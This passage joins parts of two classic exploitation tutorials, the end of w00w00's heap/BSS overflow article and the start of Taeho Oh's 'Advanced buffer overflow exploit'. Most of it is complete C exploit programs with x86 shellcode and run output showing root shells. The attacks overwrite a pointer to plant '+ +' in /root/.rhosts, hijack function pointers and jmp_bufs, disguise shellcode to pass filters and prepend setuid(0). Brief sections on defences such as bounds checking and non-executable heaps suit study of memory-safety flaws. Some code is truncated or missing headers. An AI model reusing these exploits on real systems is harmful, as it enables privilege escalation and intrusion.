static char buf[BUFSIZE], *tmpfile;
if (argc <= 1)
{
fprintf(stderr, "Usage: %s \n", argv[0]);
exit(ERROR);
}
tmpfile = "/tmp/vulprog.tmp"; /* no, this is not a temp file vul */
printf("before: tmpfile = %s\n", tmpfile);
printf("Enter one line of data to put in %s: ", tmpfile);
gets(buf);
printf("\nafter: tmpfile = %s\n", tmpfile);
tmpfd = fopen(tmpfile, "w");
if (tmpfd == NULL)
{
fprintf(stderr, "error opening %s: %s\n", tmpfile,
strerror(errno));
exit(ERROR);
}
fputs(buf, tmpfd);
fclose(tmpfd);
}
-----------------------------------------------------------------------------
The aim of this "example" program is to demonstrate that something of
this nature can easily occur in programs (although hopefully not setuid
or root-owned daemon servers).
And here is our exploit for the vulnerable program:
-----------------------------------------------------------------------------
/*
* Copyright (C) January 1999, Matt Conover & WSD
*
* This will exploit vulprog1.c. It passes some arguments to the
* program (that the vulnerable program doesn't use). The vulnerable
* program expects us to enter one line of input to be stored
* temporarily. However, because of a static buffer overflow, we can
* overwrite the temporary filename pointer, to have it point to
* argv[1] (which we could pass as "/root/.rhosts"). Then it will
* write our temporary line to this file. So our overflow string (what
* we pass as our input line) will be:
* + + # (tmpfile addr) - (buf addr) # of A's | argv[1] address
*
* We use "+ +" (all hosts), followed by '#' (comment indicator), to
* prevent our "attack code" from causing problems. Without the
* "#", programs using .rhosts would misinterpret our attack code.
*
* Compile as: gcc -o exploit1 exploit1.c
*/
#include
#include
#include
#include
#define BUFSIZE 256
#define DIFF 16 /* estimated diff between buf/tmpfile in vulprog */
#define VULPROG "./vulprog1"
#define VULFILE "/root/.rhosts" /* the file 'buf' will be stored in */
/* get value of sp off the stack (used to calculate argv[1] address) */
u_long getesp()
{
__asm__("movl %esp,%eax"); /* equiv. of 'return esp;' in C */
}
int main(int argc, char **argv)
{
u_long addr;
register int i;
int mainbufsize;
char *mainbuf, buf[DIFF+6+1] = "+ +\t# ";
/* ------------------------------------------------------ */
if (argc <= 1)
{
fprintf(stderr, "Usage: %s [try 310-330]\n", argv[0]);
exit(ERROR);
}
/* ------------------------------------------------------ */
memset(buf, 0, sizeof(buf)), strcpy(buf, "+ +\t# ");
memset(buf + strlen(buf), 'A', DIFF);
addr = getesp() + atoi(argv[1]);
/* reverse byte order (on a little endian system) */
for (i = 0; i < sizeof(u_long); i++)
buf[DIFF + i] = ((u_long)addr >> (i * 8) & 255);
mainbufsize = strlen(buf) + strlen(VULPROG) + strlen(VULFILE) + 13;
mainbuf = (char *)malloc(mainbufsize);
memset(mainbuf, 0, sizeof(mainbuf));
snprintf(mainbuf, mainbufsize - 1, "echo '%s' | %s %s\n",
buf, VULPROG, VULFILE);
printf("Overflowing tmpaddr to point to %p, check %s after.\n\n",
addr, VULFILE);
system(mainbuf);
return 0;
}
-----------------------------------------------------------------------------
Here's what happens when we run it:
[root /w00w00/heap/examples/vulpkgs/vulpkg1]# ./exploit1 320
Overflowing tmpaddr to point to 0xbffffd60, check /root/.rhosts after.
before: tmpfile = /tmp/vulprog.tmp
Enter one line of data to put in /tmp/vulprog.tmp:
after: tmpfile = /vulprog1
Well, we can see that's part of argv[0] ("./vulprog1"), so we know we are
close:
[root /w00w00/heap/examples/vulpkgs/vulpkg1]# ./exploit1 330
Overflowing tmpaddr to point to 0xbffffd6a, check /root/.rhosts after.
before: tmpfile = /tmp/vulprog.tmp
Enter one line of data to put in /tmp/vulprog.tmp:
after: tmpfile = /root/.rhosts
[root /tmp/heap/examples/advanced/vul-pkg1]#
Got it! The exploit overwrites the buffer that the vulnerable program
uses for gets() input. At the end of its buffer, it places the address
of where we assume argv[1] of the vulnerable program is. That is, we
overwrite everything between the overflowed buffer and the tmpfile
pointer. We ascertained the tmpfile pointer's location in memory by
sending arbitrary lengths of "A"'s until we discovered how many "A"'s it
took to reach the start of tmpfile's address. Also, if you have
source to the vulnerable program, you can also add a "printf()" to print
out the addresses/offsets between the overflowed data and the target data
(i.e., 'printf("%p - %p = 0x%lx bytes\n", buf2, buf1, (u_long)diff)').
(Un)fortunately, the offsets usually change at compile-time (as far as
I know), but we can easily recalculate, guess, or "brute force" the
offsets.
Note:
Now that we need a valid address (argv[1]'s address), we must reverse
the byte order for little endian systems. Little endian systems use
the least significant byte first (x86 is little endian) so that
0x12345678 is 0x78563412 in memory. If we were doing this on a big
endian system (such as a sparc) we could drop out the code to reverse
the byte order. On a big endian system (like sparc), we could leave
the addresses alone.
Further note:
So far none of these examples required an executable heap! As I
briefly mentioned in the "Why Heap/BSS Overflows are Significant"
section, these (with the exception of the address byte order) previous
examples were all system/architecture independent. This is useful in
exploiting heap-based overflows.
With knowledge of how to overwrite pointers, we're going to show how to
modify function pointers. The downside to exploiting function pointers
(and the others to follow) is that they require an executable heap.
A function pointer (i.e., "int (*funcptr)(char *str)") allows a
programmer to dynamically modify a function to be called. We can
overwrite a function pointer by overwriting its address, so that when
it's executed, it calls the function we point it to instead. This is
good news because there are several options we have. First, we
can include our own shellcode. We can do one of the following with
shellcode:
1. argv[] method: store the shellcode in an argument to the program
(requiring an executable stack)
2. heap offset method: offset from the top of the heap to the
estimated address of the target/overflow buffer (requiring an
executable heap)
Note: There is a greater probability of the heap being executable than
the stack on any given system. Therefore, the heap method will probably
work more often.
A second method is to simply guess (though it's inefficient) the address
of a function, using an estimated offset of that in the vulnerable
program. Also, if we know the address of system() in our program, it
will be at a very close offset, assuming both vulprog/exploit were
compiled the same way. The advantage is that no executable is required.
Note:
Another method is to use the PLT (Procedure Linking Table) which shares
the address of a function in the PLT. I first learned the PLT method
from str (stranJer) in a non-executable stack exploit for sparc.
The reason the second method is the preferred method, is simplicity.
We can guess the offset of system() in the vulprog from the address of
system() in our exploit fairly quickly. This is synonymous on remote
systems (assuming similar versions, operating systems, and
architectures). With the stack method, the advantage is that we can do
whatever we want, and we don't require compatible function pointers
(i.e., char (*funcptr)(int a) and void (*funcptr)() would work the same).
The disadvantage (as mentioned earlier) is that it requires an
executable stack.
Here is our vulnerable program for the following 2 exploits:
-----------------------------------------------------------------------------
/*
* Just the vulnerable program we will exploit.
* Compile as: gcc -o vulprog vulprog.c (or change exploit macros)
*/
#include
#include
#include
#include
#define ERROR -1
#define BUFSIZE 64
int goodfunc(const char *str); /* funcptr starts out as this */
int main(int argc, char **argv)
{
static char buf[BUFSIZE];
static int (*funcptr)(const char *str);
if (argc <= 2)
{
fprintf(stderr, "Usage: %s \n", argv[0]);
exit(ERROR);
}
printf("(for 1st exploit) system() = %p\n", system);
printf("(for 2nd exploit, stack method) argv[2] = %p\n", argv[2]);
printf("(for 2nd exploit, heap offset method) buf = %p\n\n", buf);
funcptr = (int (*)(const char *str))goodfunc;
printf("before overflow: funcptr points to %p\n", funcptr);
memset(buf, 0, sizeof(buf));
strncpy(buf, argv[1], strlen(argv[1]));
printf("after overflow: funcptr points to %p\n", funcptr);
(void)(*funcptr)(argv[2]);
return 0;
}
/* ---------------------------------------------- */
/* This is what funcptr would point to if we didn't overflow it */
int goodfunc(const char *str)
{
printf("\nHi, I'm a good function. I was passed: %s\n", str);
return 0;
}
-----------------------------------------------------------------------------
Our first example, is the system() method:
-----------------------------------------------------------------------------
/*
* Copyright (C) January 1999, Matt Conover & WSD
*
* Demonstrates overflowing/manipulating static function pointers in
* the bss (uninitialized data) to execute functions.
*
* Try in the offset (argv[2]) in the range of 0-20 (10-16 is best)
* To compile use: gcc -o exploit1 exploit1.c
*/
#include
#include
#include
#include
#define BUFSIZE 64 /* the estimated diff between funcptr/buf */
#define VULPROG "./vulprog" /* vulnerable program location */
#define CMD "/bin/sh" /* command to execute if successful */
#define ERROR -1
int main(int argc, char **argv)
{
register int i;
u_long sysaddr;
static char buf[BUFSIZE + sizeof(u_long) + 1] = {0};
if (argc <= 1)
{
fprintf(stderr, "Usage: %s \n", argv[0]);
fprintf(stderr, "[offset = estimated system() offset]\n\n");
exit(ERROR);
}
sysaddr = (u_long)&system - atoi(argv[1]);
printf("trying system() at 0x%lx\n", sysaddr);
memset(buf, 'A', BUFSIZE);
/* reverse byte order (on a little endian system) (ntohl equiv) */
for (i = 0; i < sizeof(sysaddr); i++)
buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255;
execl(VULPROG, VULPROG, buf, CMD, NULL);
return 0;
}
-----------------------------------------------------------------------------
When we run this with an offset of 16 (which may vary) we get:
[root /w00w00/heap/examples]# ./exploit1 16
trying system() at 0x80484d0
(for 1st exploit) system() = 0x80484d0
(for 2nd exploit, stack method) argv[2] = 0xbffffd3c
(for 2nd exploit, heap offset method) buf = 0x804a9a8
before overflow: funcptr points to 0x8048770
after overflow: funcptr points to 0x80484d0
bash#
And our second example, using both argv[] and heap offset method:
-----------------------------------------------------------------------------
/*
* Copyright (C) January 1999, Matt Conover & WSD
*
* This demonstrates how to exploit a static buffer to point the
* function pointer at argv[] to execute shellcode. This requires
* an executable heap to succeed.
*
* The exploit takes two argumenst (the offset and "heap"/"stack").
* For argv[] method, it's an estimated offset to argv[2] from
* the stack top. For the heap offset method, it's an estimated offset
* to the target/overflow buffer from the heap top.
*
* Try values somewhere between 325-345 for argv[] method, and 420-450
* for heap.
*
* To compile use: gcc -o exploit2 exploit2.c
*/
#include
#include
#include
#include
#define ERROR -1
#define BUFSIZE 64 /* estimated diff between buf/funcptr */
#define VULPROG "./vulprog" /* where the vulprog is */
char shellcode[] = /* just aleph1's old shellcode (linux x86) */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0"
"\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
"\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
u_long getesp()
{
__asm__("movl %esp,%eax"); /* set sp as return value */
}
int main(int argc, char **argv)
{
register int i;
u_long sysaddr;
char buf[BUFSIZE + sizeof(u_long) + 1];
if (argc <= 2)
{
fprintf(stderr, "Usage: %s \n", argv[0]);
exit(ERROR);
}
if (strncmp(argv[2], "stack", 5) == 0)
{
printf("Using stack for shellcode (requires exec. stack)\n");
sysaddr = getesp() + atoi(argv[1]);
printf("Using 0x%lx as our argv[1] address\n\n", sysaddr);
memset(buf, 'A', BUFSIZE + sizeof(u_long));
}
else
{
printf("Using heap buffer for shellcode "
"(requires exec. heap)\n");
sysaddr = (u_long)sbrk(0) - atoi(argv[1]);
printf("Using 0x%lx as our buffer's address\n\n", sysaddr);
if (BUFSIZE + 4 + 1 < strlen(shellcode))
{
fprintf(stderr, "error: buffer is too small for shellcode "
"(min. = %d bytes)\n", strlen(shellcode));
exit(ERROR);
}
strcpy(buf, shellcode);
memset(buf + strlen(shellcode), 'A',
BUFSIZE - strlen(shellcode) + sizeof(u_long));
}
buf[BUFSIZE + sizeof(u_long)] = '\0';
/* reverse byte order (on a little endian system) (ntohl equiv) */
for (i = 0; i < sizeof(sysaddr); i++)
buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255;
execl(VULPROG, VULPROG, buf, shellcode, NULL);
return 0;
}
-----------------------------------------------------------------------------
When we run this with an offset of 334 for the argv[] method we get:
[root /w00w00/heap/examples] ./exploit2 334 stack
Using stack for shellcode (requires exec. stack)
Using 0xbffffd16 as our argv[1] address
(for 1st exploit) system() = 0x80484d0
(for 2nd exploit, stack method) argv[2] = 0xbffffd16
(for 2nd exploit, heap offset method) buf = 0x804a9a8
before overflow: funcptr points to 0x8048770
after overflow: funcptr points to 0xbffffd16
bash#
When we run this with an offset of 428-442 for the heap offset method we get:
[root /w00w00/heap/examples] ./exploit2 428 heap
Using heap buffer for shellcode (requires exec. heap)
Using 0x804a9a8 as our buffer's address
(for 1st exploit) system() = 0x80484d0
(for 2nd exploit, stack method) argv[2] = 0xbffffd16
(for 2nd exploit, heap offset method) buf = 0x804a9a8
before overflow: funcptr points to 0x8048770
after overflow: funcptr points to 0x804a9a8
bash#
Note:
Another advantage to the heap method is that you have a large
working range. With argv[] (stack) method, it needed to be exact. With
the heap offset method, any offset between 428-442 worked.
As you can see, there are several different methods to exploit the same
problem. As an added bonus, we'll include a final type of exploitation
that uses jmp_bufs (setjmp/longjmp). jmp_buf's basically store a stack
frame, and jump to it at a later point in execution. If we get a chance
to overflow a buffer between setjmp() and longjmp(), that's above the
overflowed buffer, this can be exploited. We can set these up to emulate
the behavior of a stack-based overflow (as does the argv[] shellcode
method used earlier, also). Now this is the jmp_buf for an x86 system.
These will needed to be modified for other architectures, accordingly.
First we will include a vulnerable program again:
-----------------------------------------------------------------------------
/*
* This is just a basic vulnerable program to demonstrate
* how to overwrite/modify jmp_buf's to modify the course of
* execution.
*/
#include
#include
#include
#include
#include
#define ERROR -1
#define BUFSIZE 16
static char buf[BUFSIZE];
jmp_buf jmpbuf;
u_long getesp()
{
__asm__("movl %esp,%eax"); /* the return value goes in %eax */
}
int main(int argc, char **argv)
{
if (argc <= 1)
{
fprintf(stderr, "Usage: %s \n");
exit(ERROR);
}
printf("[vulprog] argv[2] = %p\n", argv[2]);
printf("[vulprog] sp = 0x%lx\n\n", getesp());
if (setjmp(jmpbuf)) /* if > 0, we got here from longjmp() */
{
fprintf(stderr, "error: exploit didn't work\n");
exit(ERROR);
}
printf("before:\n");
printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n",
jmpbuf->__bx, jmpbuf->__si, jmpbuf->__di);
printf("bp = %p, sp = %p, pc = %p\n\n",
jmpbuf->__bp, jmpbuf->__sp, jmpbuf->__pc);
strncpy(buf, argv[1], strlen(argv[1])); /* actual copy here */
printf("after:\n");
printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n",
jmpbuf->__bx, jmpbuf->__si, jmpbuf->__di);
printf("bp = %p, sp = %p, pc = %p\n\n",
jmpbuf->__bp, jmpbuf->__sp, jmpbuf->__pc);
longjmp(jmpbuf, 1);
return 0;
}
-----------------------------------------------------------------------------
The reason we have the vulnerable program output its stack pointer (esp
on x86) is that it makes "guessing" easier for the novice.
And now the exploit for it (you should be able to follow it):
-----------------------------------------------------------------------------
/*
* Copyright (C) January 1999, Matt Conover & WSD
*
* Demonstrates a method of overwriting jmpbuf's (setjmp/longjmp)
* to emulate a stack-based overflow in the heap. By that I mean,
* you would overflow the sp/pc of the jmpbuf. When longjmp() is
* called, it will execute the next instruction at that address.
* Therefore, we can stick shellcode at this address (as the data/heap
* section on most systems is executable), and it will be executed.
*
* This takes two arguments (offsets):
* arg 1 - stack offset (should be about 25-45).
* arg 2 - argv offset (should be about 310-330).
*/
#include
#include
#include
#include
#define ERROR -1
#define BUFSIZE 16
#define VULPROG "./vulprog4"
char shellcode[] = /* just aleph1's old shellcode (linux x86) */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0"
"\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
"\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
u_long getesp()
{
__asm__("movl %esp,%eax"); /* the return value goes in %eax */
}
int main(int argc, char **argv)
{
int stackaddr, argvaddr;
register int index, i, j;
char buf[BUFSIZE + 24 + 1];
if (argc <= 1)
{
fprintf(stderr, "Usage: %s \n",
argv[0]);
fprintf(stderr, "[stack offset = offset to stack of vulprog\n");
fprintf(stderr, "[argv offset = offset to argv[2]]\n");
exit(ERROR);
}
stackaddr = getesp() - atoi(argv[1]);
argvaddr = getesp() + atoi(argv[2]);
printf("trying address 0x%lx for argv[2]\n", argvaddr);
printf("trying address 0x%lx for sp\n\n", stackaddr);
/*
* The second memset() is needed, because otherwise some values
* will be (null) and the longjmp() won't do our shellcode.
*/
memset(buf, 'A', BUFSIZE), memset(buf + BUFSIZE + 4, 0x1, 12);
buf[BUFSIZE+24] = '\0';
/* ------------------------------------- */
/*
* We need the stack pointer, because to set pc to our shellcode
* address, we have to overwrite the stack pointer for jmpbuf.
* Therefore, we'll rewrite it with the real address again.
*/
/* reverse byte order (on a little endian system) (ntohl equiv) */
for (i = 0; i < sizeof(u_long); i++) /* setup BP */
{
index = BUFSIZE + 16 + i;
buf[index] = (stackaddr >> (i * 8)) & 255;
}
/* ----------------------------- */
/* reverse byte order (on a little endian system) (ntohl equiv) */
for (i = 0; i < sizeof(u_long); i++) /* setup SP */
{
index = BUFSIZE + 20 + i;
buf[index] = (stackaddr >> (i * 8)) & 255;
}
/* ----------------------------- */
/* reverse byte order (on a little endian system) (ntohl equiv) */
for (i = 0; i < sizeof(u_long); i++) /* setup PC */
{
index = BUFSIZE + 24 + i;
buf[index] = (argvaddr >> (i * 8)) & 255;
}
execl(VULPROG, VULPROG, buf, shellcode, NULL);
return 0;
}
-----------------------------------------------------------------------------
Ouch, that was sloppy. But anyway, when we run this with a stack offset
of 36 and a argv[2] offset of 322, we get the following:
[root /w00w00/heap/examples/vulpkgs/vulpkg4]# ./exploit4 36 322
trying address 0xbffffcf6 for argv[2]
trying address 0xbffffb90 for sp
[vulprog] argv[2] = 0xbffffcf6
[vulprog] sp = 0xbffffb90
before:
bx = 0x0, si = 0x40001fb0, di = 0x4000000f
bp = 0xbffffb98, sp = 0xbffffb94, pc = 0x8048715
after:
bx = 0x1010101, si = 0x1010101, di = 0x1010101
bp = 0xbffffb90, sp = 0xbffffb90, pc = 0xbffffcf6
bash#
w00w00! For those of you that are saying, "Okay. I see this works in a
controlled environment; but what about in the wild?" There is sensitive
data on the heap that can be overflowed. Examples include:
functions reason
1. *gets()/*printf(), *scanf() __iob (FILE) structure in heap
2. popen() __iob (FILE) structure in heap
3. *dir() (readdir, seekdir, ...) DIR entries (dir/heap buffers)
4. atexit() static/global function pointers
5. strdup() allocates dynamic data in the heap
7. getenv() stored data on heap
8. tmpnam() stored data on heap
9. malloc() chain pointers
10. rpc callback functions function pointers
11. windows callback functions func pointers kept on heap
12. signal handler pointers function pointers (note: unix tracks
in cygnus (gcc for win), these in the kernel, not in the heap)
Now, you can definitely see some uses these functions. Room allocated
for FILE structures in functions such as printf()'s, fget()'s,
readdir()'s, seekdir()'s, etc. can be manipulated (buffer or function
pointers). atexit() has function pointers that will be called when the
program terminates. strdup() can store strings (such as filenames or
passwords) on the heap. malloc()'s own chain pointers (inside its pool)
can be manipulated to access memory it wasn't meant to be. getenv()
stores data on the heap, which would allow us modify something such as
$HOME after it's initially checked. svc/rpc registration functions
(librpc, libnsl, etc.) keep callback functions stored on the heap.
We will demonstrate overwriting Windows callback functions and
overwriting FILE (__iob) structures (with popen).
Once you know how to overwrite FILE sturctures with popen(), you can
quickly figure out how to do it with other functions (i.e., *printf,
*gets, *scanf, etc.), as well as DIR structures (because they are
similar.
Now for some case studies! Our two "real world" vulnerabilities will be
Solaris' tip and BSDI's crontab. The BSDI crontab vulnerability
was discovered by mudge of L0pht (see L0pht 1996 Advisory Page). We're
reusing it because it's a textbook example of a heap-based overflow
(though we will use our own method of exploitation).
Our first case study will be the BSDI crontab heap-based overflow. We
can pass a long filename, which will overflow a static buffer. Above
that buffer in memory, we have a pwd (see pwd.h) structure! This stores
a user's user name, password, uid, gid, etc. By overwriting the uid/gid
field of the pwd, we can modify the privileges that crond will run our
crontab with (as soon as it tries to run our crontab). This script could
then put out a suid root shell, because our script will be running with
uid/gid 0.
Here is our exploit code:
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
When we run it on a BSDI X.X machine, we get the following:
[Put exploit output here]
'tip' is run suid uucp on Solaris. It is possible to get root once uucp
privileges are gained (but, that's outside the scope of this article).
Tip will overflow a static buffer when prompting for a file to
send/receive. Above the static buffer in memory is a jmp_buf. By
overwriting the static buffer and then causing a SIGINT, we can get
shellcode executed (by storing it in argv[]). To exploit successfully,
we need to either connect to a valid system, or create a "fake device"
with which tip will connect to.
Here is our tip exploit:
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
When we run it on a Solaris 2.7 machine, we get the following:
[Put exploit output here]
Possible Fixes (Workarounds)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Obviously, the best prevention for heap-based overflows is writing good
code! Similar to stack-based overflows, there is no real way of
preventing heap-based overflows.
We can get a copy of the bounds checking gcc/egcs (which should locate
most potential heap-based overflows) developed by Richard Jones and Paul
Kelly. This program can be downloaded from Richard Jone's homepage
at http://www.annexia.demon.co.uk. It detects overruns that might be
missed by human error. One example they use is: "int array[10]; for (i =
0; i <= 10; i++) array[i] = 1". I have never used it.
Note:
For Windows, one could use NuMega's bounds checker which essentially
performs the same as the bounds checking gcc.
We can always make a non-executable heap patch (as mentioned early, most
systems have an executable heap). During a conversation I had with Solar
Designer, he mentioned the main problems with a non-executable would
involve compilers, interpreters, etc.
Note:
I added a note section here to reiterate the point a non-executable
heap does NOT prevent heap overflows at all. It means we can't execute
instructions in the heap. It does NOT prevent us from overwriting data
in the heap.
Likewise, another possibility is to make a "HeapGuard", which would be
the equivalent to Cowan's StackGuard mentioned earlier. He (et. al.)
also developed something called "MemGuard", but it's a misnomer.
Its function is to prevent a return address (on the stack) from being
overwritten (via canary values) on the stack. It does nothing to prevent
overflows in the heap or bss.
Acknowledgements
~~~~~~~~~~~~~~~~
There has been a significant amount of work on heap-based overflows in
the past. We ought to name some other people who have published work
involving heap/bss-based overflows (though, our work wasn't based off
them).
Solar Designer: SuperProbe exploit (function pointers), color_xterm
exploit (struct pointers), WebSite (pointer arrays), etc.
L0pht: Internet Explorer 4.01 vulnerablity (dildog), BSDI crontab
exploit (mudge), etc.
Some others who have published exploits for heap-based overflows (thanks
to stranJer for pointing them out) are Joe Zbiciak (solaris ps) and Adam
Morrison (stdioflow). I'm sure there are many others, and I apologize for
excluding anyone.
I'd also like to thank the following people who had some direct
involvement in this article: str (stranJer), halflife, and jobe.
Indirect involvements: Solar Designer, mudge, and other w00w00
affiliates.
Other good sources of info include: as/gcc/ld info files (/usr/info/*),
BugTraq archives (http://www.geek-girl.com/bugtraq), w00w00
(http://www.w00w00.org), and L0pht (http://www.l0pht.com), etc.
Epilogue:
Most people who claim their systems are "secure" are saying so out of
a lack of knowledge (ignorant seemed a little too strong). Assuming
security leads to a false sense of security (e.g., azrael.phrack.com,
has remote vulnerabilities involving heap-based overflows that have gone
unnoticed for quite a while). Hopefully, people will experiment with
heap-based overflows, and in turn, will become more aware that the
problems exist. We need to realize that the problems are out there,
waiting to be fixed.
Thanks for reading! We hope you've enjoyed it! You can e-mail me at
shok@dataforce.net, or mattc@repsec.com. See the w00w00 (www.w00w00.org)
web site, also!
------------------------------------------------------------------------------
Matt Conover (a.k.a. Shok) & w00w00 Security Team
[ http://www.w00w00.org, w00w00 Security Development (WSD) ]
[ See the URL above for information on: what w00w00 is, our ]
[ security projects (all available online), some of our ]
[ articles, and more. Enjoy! ]
Advanced buffer overflow exploit
Written by Taeho Oh ( ohhara@postech.edu )
----------------------------------------------------------------------------
Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus
PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug
----------------------------------------------------------------------------
1. Introduction
Nowadays there are many buffer overflow exploit codes. The early buffer
overflow exploit codes only spawn a shell ( execute /bin/sh ). However,
nowadays some of the buffer overflow exploit codes have very nice features.
For example, passing through filtering, opening a socket, breaking chroot,
and so on. This paper will attempt to explain the advanced buffer overflow
exploit skill under intel x86 linux.
2. What do you have to know before reading?
You have to know assembly language, C language, and Linux. Of course, you
have to know what buffer overflow is. You can get the information of the
buffer overflow in phrack 49-14 ( Smashing The Stack For Fun And Profit
by Aleph1 ). It is a wonderful paper of buffer overflow and I highly recommend
you to read that before reading this one.
3. Pass through filtering
There are many programs which has buffer overflow problems. Why are not the
all buffer overflow problems exploited? Because even if a program has a buffer
overflow condition, it can be hard to exploit. In many cases, the reason is
that the program filters some characters or converts characters into other
characters. If the program filters all non printable characters, it's too
hard to exploit. If the program filters some of characters, you can pass
through the filter by making good buffer overflow exploit code. :)
3.1 The example vulnerable program
vulnerable1.c
----------------------------------------------------------------------------
#include
#include
int main(int argc,int **argv)
{
char buffer[1024];
int i;
if(argc>1)
{
for(i=0;i
#include
#define ALIGN 0
#define OFFSET 0
#define RET_POSITION 1024
#define RANGE 20
#define NOP 0x90
char shellcode[]=
"\xeb\x38" /* jmp 0x38 */
"\x5e" /* popl %esi */
"\x80\x46\x01\x50" /* addb $0x50,0x1(%esi) */
"\x80\x46\x02\x50" /* addb $0x50,0x2(%esi) */
"\x80\x46\x03\x50" /* addb $0x50,0x3(%esi) */
"\x80\x46\x05\x50" /* addb $0x50,0x5(%esi) */
"\x80\x46\x06\x50" /* addb $0x50,0x6(%esi) */
"\x89\xf0" /* movl %esi,%eax */
"\x83\xc0\x08" /* addl $0x8,%eax */
"\x89\x46\x08" /* movl %eax,0x8(%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x88\x46\x07" /* movb %eax,0x7(%esi) */
"\x89\x46\x0c" /* movl %eax,0xc(%esi) */
"\xb0\x0b" /* movb $0xb,%al */
"\x89\xf3" /* movl %esi,%ebx */
"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */
"\xcd\x80" /* int $0x80 */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xd8" /* movl %ebx,%eax */
"\x40" /* inc %eax */
"\xcd\x80" /* int $0x80 */
"\xe8\xc3\xff\xff\xff" /* call -0x3d */
"\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh" */
/* /bin/sh is disguised */
unsigned long get_sp(void)
{
__asm__("movl %esp,%eax");
}
main(int argc,char **argv)
{
char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
long addr;
unsigned long sp;
int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
int i;
if(argc>1)
offset=atoi(argv[1]);
sp=get_sp();
addr=sp-offset;
for(i=0;i>8;
buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
buff[i+ALIGN+3]=(addr&0xff000000)>>24;
}
for(i=0;i
#include
int main(int argc,char **argv)
{
char buffer[1024];
seteuid(getuid());
if(argc>1)
strcpy(buffer,argv[1]);
}
----------------------------------------------------------------------------
This vulnerable program calls seteuid(getuid()) at start. Therefore, you
may think that "strcpy(buffer,argv[1]);" is OK. Because you can only get
your own shell although you succeed in buffer overflow attack. However,
if you insert a code which calls setuid(0) in the shellcode, you can get
root shell. :)
4.2 Make setuid(0) code
setuidasm.c
----------------------------------------------------------------------------
main()
{
setuid(0);
}
----------------------------------------------------------------------------
compile and disassemble
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc -o setuidasm -static setuidasm.c
[ ohhara@ohhara ~ ] {2} $ gdb setuidasm
GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) disassemble setuid
Dump of assembler code for function __setuid:
0x804ca00 <__setuid>: movl %ebx,%edx
0x804ca02 <__setuid+2>: movl 0x4(%esp,1),%ebx
0x804ca06 <__setuid+6>: movl $0x17,%eax
0x804ca0b <__setuid+11>: int $0x80
0x804ca0d <__setuid+13>: movl %edx,%ebx
0x804ca0f <__setuid+15>: cmpl $0xfffff001,%eax
0x804ca14 <__setuid+20>: jae 0x804cc10 <__syscall_error>
0x804ca1a <__setuid+26>: ret
0x804ca1b <__setuid+27>: nop
0x804ca1c <__setuid+28>: nop
0x804ca1d <__setuid+29>: nop
0x804ca1e <__setuid+30>: nop
0x804ca1f <__setuid+31>: nop
End of assembler dump.
(gdb)
----------------------------------------------------------------------------
setuid(0); code
----------------------------------------------------------------------------
char code[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x31\xdb" /* xorl %ebx,%ebx */
"\xb0\x17" /* movb $0x17,%al */
"\xcd\x80"; /* int $0x80 */
----------------------------------------------------------------------------
4.3 Modify the normal shellcode
Making new shellcode is very easy if you make setuid(0) code. Just insert
the code into the start of the normal shellcode.
new shellcode
----------------------------------------------------------------------------
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x31\xdb" /* xorl %ebx,%ebx */
"\xb0\x17" /* movb $0x17,%al */
"\xcd\x80" /* int $0x80 */
"\xeb\x1f" /* jmp 0x1f */
"\x5e" /* popl %esi */
"\x89\x76\x08" /* movl %esi,0x8(%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x88\x46\x07" /* movb %eax,0x7(%esi) */
"\x89\x46\x0c" /* movl %eax,0xc(%esi) */
"\xb0\x0b" /* movb $0xb,%al */
"\x89\xf3" /* movl %esi,%ebx */
"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */
"\xcd\x80" /* int $0x80 */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xd8" /* movl %ebx,%eax */
"\x40" /* inc %eax */
"\xcd\x80" /* int $0x80 */
"\xe8\xdc\xff\xff\xff" /* call -0x24 */
"/bin/sh"; /* .string \"/bin/sh\" */
----------------------------------------------------------------------------
4.4 Exploit vulnerable2 program
With this shellcode, you can make an exploit code easily.
exploit2.c
----------------------------------------------------------------------------
#include
#include
#define ALIGN 0
#define OFFSET 0
#define RET_POSITION 1024
#define RANGE 20
#define NOP 0x90
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x31\xdb" /* xorl %ebx,%ebx */
"\xb0\x17" /* movb $0x17,%al */
"\xcd\x80" /* int $0x80 */
"\xeb\x1f" /* jmp 0x1f */
"\x5e" /* popl %esi */
